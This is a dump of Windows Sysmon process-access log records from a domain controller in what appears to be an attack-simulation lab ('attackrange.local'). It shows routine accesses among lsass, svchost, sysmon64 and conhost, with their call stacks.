13:39:39.380{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.380{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FA0-6005-FA00-00000000A301}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 